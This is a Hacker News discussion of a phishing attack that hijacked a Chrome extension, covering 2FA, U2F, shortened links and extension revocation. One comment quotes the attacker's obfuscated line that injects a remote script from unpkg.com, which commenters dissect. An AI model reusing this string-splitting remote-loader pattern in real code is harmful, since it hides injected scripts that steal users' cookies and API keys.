Looking at the attacker's code, they are currently trying to steal cloudflare api keys in addition to stealing cookies from all sites the extension users visit :(


Of course it's a phishing attack. Why would Google send you a bit.ly link to your own Google account?


"Note that the bitly link was not directly visible in the phishing email, as it was an HTML-email. That is another lesson learned: Back to standard, text-based email as the default."


Thunderbird has phishing/scam detection built in that shows a pop-up with "this message might be a scam" if there is URL-like text in the message that points to another, different URL. So having the text "www.google.com" with a link to bit.ly would show a warning.

Sadly it is a bit overzealous and shows messages with say www.google.com that go to www.google.com/ as malicious too (i.e. trailing / so the text and URL don't exactly match though they resolve to the same thing), but the idea seems sound. I'm surprised gmail doesn't have something like this.


I always look at the mouse over url. And check the URL in the address bar. And rely on the password manager in the browser. And sometimes login in a new tab, then go back and reload the link.


A pity some browsers now hide the mouse over URL.

I use this in safari to bring it back: https://visnup.github.io/Minimal-Status-Bar/


In Safari you can go to "View -> Show status bar" to bring it back natively without a third-party extension.


Amazing, thanks!


bit.ly addresses don't keep their URL in the address bar (Eg. http://bit.ly/19y8wyr for HN), so it's possible you might not notice it once you've clicked, depending on how realistic the malicious target URL was.


Password managers really help in that situation. They will refuse to autofill your Google password if you're redirected to a domain that looks like google.com but actually contains weird Unicode characters, for example.


They could have used the goo.gl shortener, or an open redirect on google.com.


Something to be said about auto updating software...


I'd have though that two-factor authentication could have prevented this type of attack?


It could, and the plugin creators regret not having it active for everyone's account:

> Sigh... totally agree. I could add a longer story why just this account had no 2FA enabled, but the lesson learned is simple: From now on, we enable 2FA for every account that offers it.

So they won't make this mistake again.


Thanks - saw it now in the comments.


Only with U2F, because the hardware dongle would refuse to provide the OTP to a different domain


Yeah, we really need to distinguish between a 2FA app and a dedicated hardware key. My phone is probably the least secure thing I've ever owned, both in terms of technical security, and physical security.

This whole 2FA thing has been really jarring for me, because I always treated my phone like a public space: no password, no private data (that I know of), ready for inspection by foreign authorities. Of all the things the world could ask me to trust, why the phone?


> Of all the things the world could ask me to trust, why the phone?

Because it's the only instance of a computer that you can expect majority of users to own and always have on them.

2FA as a thing would not get any reasonable adoption if you required people to buy hardware keys to use it. Not to mention, hardware keys do not work on every device one would like to log in from (AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have NFC built in).


> AFAIK you can't plug in a Yubikey to an Android tablet, and it may not have NFC built in

Using an USB OTG adapter, it should be possible. However, even the flagship tablets of Samsung don't carry NFC, only the phones do - and even there it's a hit and miss if you have NFC.

Apple, on the other hand, doesn't have developer-accessible NFC anywhere.

This is a real shame.


Even a dedicated hardware key that generates an OTP[1] can still be phished. Only U2F cannot be phished.

[1] https://en.wikipedia.org/wiki/Security_token#/media/File:Cry...


For clarity: U2F does not use one-time passwords (OTP), but challenge-response authentication. This is why it provides better protection against phishing than hardware OTP tokens.


Not if the phising site asks for the 2FA token.


The point of 2FA is challenge-response and the secret key is in the token. If a phishing site asks for 2FA it can get only one valid challenge-response pair, not the secret key.


One login is enough to authorize an Oauth app.


Require second login to transfer chrome apps to alternate account + 24 hour timer on transfer that sends an email to recovery email/everyone else relevant when extension is transferring.


That still allows them to log in though.


SMS and TOTP (Google Authenticator) can both be phished.

U2F cannot be phished.


Can't it?

What if I control the user's computer and can let my own code interact with U2F? Or does the protocol somehow prevent that?


If you control the user's computer, that isn't phishing. That's keylogging/credential theft.


>> We are trying to contact Google, but so far, have been unable to reach any human being that can help.

So typical, unfortunately.


No 2FA? No additional password / 2FA challenge when a big, dangerous operation like moving an extension to another account is triggered?


We should never have to read a title "disable immediately" by a developer. In a news article. That is not how this should be distributed, in case the original developer is the one distributing the news.

Instead, Google should generate an emergency disable code that a developer can put into a simple web form from anywhere in the world, even if the developer has been locked out of every one of their accounts, which immediately centrally disables that extension.

How it should work.

Parts.

1. "revocation code generation" and explanation. Text like: "this is a secret revocation code. Anyone who learns it can immediately disable your extension. Keep it secure and separate from all of your production systems. You will be able to use it even if locked out of all other acccess."

2. A web form people can submit revocation codes to, from anywhere with Internet access.

The code should be very high-entropy and generated by Google. However, it should not have ambiguous characters like 1 and capital I.

I personally would generate it using a dicewords-like wordlist. Also, I personally would ensure it had approximately 384 bits of total entropy of which one third is a recovery checksum. This enables the developer to write many words down wrong and still be able to disable their extension. In case the recovery record/checksum portion were used, I would offer the user the result "You appeared to have made a mistake which we could correct. Is this the correct disable key?" then show the corrected version.

However, this last idea seems to be beyond the state of cryptography worldwide (i.e. for some reason I have written something that exceeds best practices worldwide, like I'm from the future or something), so I understand if Google's cryptographers don't implement this part.

The above seems a bit grandiose of me so here is the comment where I first wrote about this:

https://news.ycombinator.com/item?id=14571414


We should never have to read a title "disable immediately" by a developer. In a news article.

If you want to change that, start contacting reporters from mainstream media. If this hits the New York Times or the Wall Street Journal, or at least Techdirt, Google might notice.


Google is staffed by geniuses who also read HN and I feel it is sufficient that I suggested one possible correct solution here on HN. I am sure they'll introduce some solution to this problems. (I mean some way for them to disable compromised extensions centrally.)

I am not personally an extension developer and don't run many.


The people you need to convince is Google management, so that they prioritize this over everything else on the roadmap. One easy way to do that from outside is to make it actually a priority, by making it a PR issue. Otherwise it turns into one of those perennial 'things we want to do' that never beats out the critical items on the roadmap.


can you give a source for this insight? tell me more.

It does explain so much. for example all this work was put into a ridiculous, animated, moving, flashing new gmail sign-in page that was pre-announced for weeks (our sign-in page is changing!) and after all that work does not include even seven and a half minutes worth of improvement by a developer. For example, I had to laugh and laugh after I realized it wasn't accepting my password because my caps lock was on.

I would expect a popup warning if you have your caps lock turned on while typing. Because, you know, that is one of literally like 3 things you can do to improve a sign-in page that is that dynamic and moving and flashing. There's just not much to improve.

All that flash and it doesn't do anything at all. Your comment gives a lot of insight as to why so I would like to understand this cultural shift.

how does management work at Google now?


How would you handle exposed disable codes (say if a person who had access to it leaves the company)? There are presumably situations where revocation of the code would be needed, but that seems difficult to implement without also opening a window for the attacker to use:

* instant revocation -> attacker will just revoke the code * delayed revocation where the code remains usable for some period -> accidental exposure is irrecoverable

Maybe it's viable as an option (extension owner takes on the risk of properly managing the secret, knowing it can't be revoked easily).


We are competing with publishing "if you're my user, disable my extension."

Revocation codes should revoke. A malicious employee or compromised gmail account should be able to disable an extension, yes. The developer should then have to work to reinstate it.

Extensions are not part of the core Chrome experience.

You are asking: "As a user, are you okay with Chrome extensions being disabled by Google if its developer had their revoke key compromised?"

Nobody would say "no".

Compare: "as a user, are you okay with Microsoft Windows locking and not booting, in case Microsoft's internal revoke key experienced a security issue?" (until Microsoft issues an update which unlocks it again.)

Most people would not want that, because people need to finish working on their things in this scenario. (Of course some ultra secure installations might want that, but most wouldn't.)

The difference is that these are small, third-party developers, working on extensions, not the core functionality.

I hope this answers your question regarding how I personally would handle exposed codes.

However, I am not an extension developer or heavy extension user! I am not saying this is the only solution.


That is a good start but isn't sufficient. Many browsers exist on networks that are airgapped or are off of the Internet for extended periods of time. Plus, there are regulations or policies in many places that forbid this type of action.


Are we talking about the same thing? Chrome? Chrome literally auto-updates.


My point is that Chrome cannot always auto-update for all installations. From that standpoint I made the comment that an Internet based revocation code may not be sufficient, and disclosures/notifications will still need to be monitored by administrators.


orgs running such ridiculous setups can monitor revokes coming over the wire from google and selectively apply them themselves, if they just care about their busy-work jobs sitting reading security bulletins. I don't really care about the security of their made-up non-jobs and google shouldn't either. they can do what they like.


FYI, This "Better History" extension in Chrome has a history of selling browser history since it was sold by its developer: https://chrome.google.com/webstore/detail/better-history/obc...

They frequently remove it from the store when people notice and restore it a or so month later.

The comments over the past year or so detail the symptoms of spyware. The "Report Abuse" button in Chrome Store feels useless.


You can use the Chrome Apps & Extensions Developer Tools[1] to monitor the activity of your apps and extensions.

[1]: https://chrome.google.com/webstore/detail/chrome-apps-extens...


Can someone explain to me why the attacker wrote the script source tag as

  "var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
Instead of just:

  var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';


To make it mor difficult to analyze the script. A simple string search will fail to catch the offending code.


It’s usually done to prevent the parser from interpreting the closing script tag early: https://stackoverflow.com/questions/236073/why-split-the-scr...


If this is truly the reason the coder went overboard in parsing it up IMO.


Please use Google's "Password Alert" Chrome extension to protect your Google account. It will notify you if you accidentally enter your Google password on another website.


> Back to standard, text-based email as the default.

Yeah, but what will you do when your receive an HTML-only mail, or a mail with text/plain alternative saying "lol, get a better MUA", or a mail with text/plain alternative so mangled it can't be read without making your brain hurt?

All these are common occurrences in automatically sent e-mails these days.


View the HTML mail, but with fancy rendering, images, all remote content, etc. disabled.

Thunderbird does this by default.


> View the HTML mail

And that's exactly what phishers want you to do.


Debian patched the Chromium browser to refuse to install or update add-ons from the Chrome store. At first I found this annoying, but I am coming around to their way of thinking--that ultimately I can only trust software in the Debian archive.


While I understand how some people can take this as a cautionary tale in favor of 2FA, as someone who doesn't like it and won't use it, I guess my mindset is very simple. There's the old saw that over time, computing has evolved from smart people in front of dumb terminals into dumb people in front of "smart" terminals. This attack is proof of it; and while 2FA might have had an impact, the major issue here is that we had a dumb person - this "unlucky" team member - who either didn't have the training or the common sense to understand that if you have a public presence on the Internet, you are a target. If you have auto-updating software installed on more than 1 machine, you are going to be someone's target because they want access to that person's computer.

The lesson here is: never trust anyone or anything.


> The lesson here is: never trust anyone or anything.

Which is why you should use 2FA and why you shouldn't trust someone who says they don't use it.


I don't trust any of the 2FA providers. And I have neither the time nor the interest to try and learn to code it in binary.


TOTP is a specification and there are many free software implementations. U2F is also a specification (but generally they aren't free software implementations).


Again - I don't trust the people who created the specifications; and I don't trust either the free implementors or the non-free ones, though my inclination would be to go with non-free if I were forced. As it is, I simply don't use services that rely on them.


> The lesson here is: never trust anyone or anything.

I find it interesting that most people who replied to your post were upset with you. The first maxim of programming is, "all input is evil." Good Internet Hygiene means not to click links in emails.


tl;dr: A member of the development team thought it unexceptional and credible that Google should be using a clickable bit.ly url in an unsolicited email asking for login and update.

The world is an uphill kind of place.


"This looked all legit to the team member" sure the team member checked the URL of the password screen? Yes, and Google using Freshdesk.


(In the article "phishing" is consistently misspelled as "pishing".)


Perhaps the author of the page really isn't the author of Copyfish, and they phished us all with a page about getting phished.


TLDR: Use FIDO hardware 2FA. The tokens are $15. No excuses.


Always do a 2fa




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact

Search: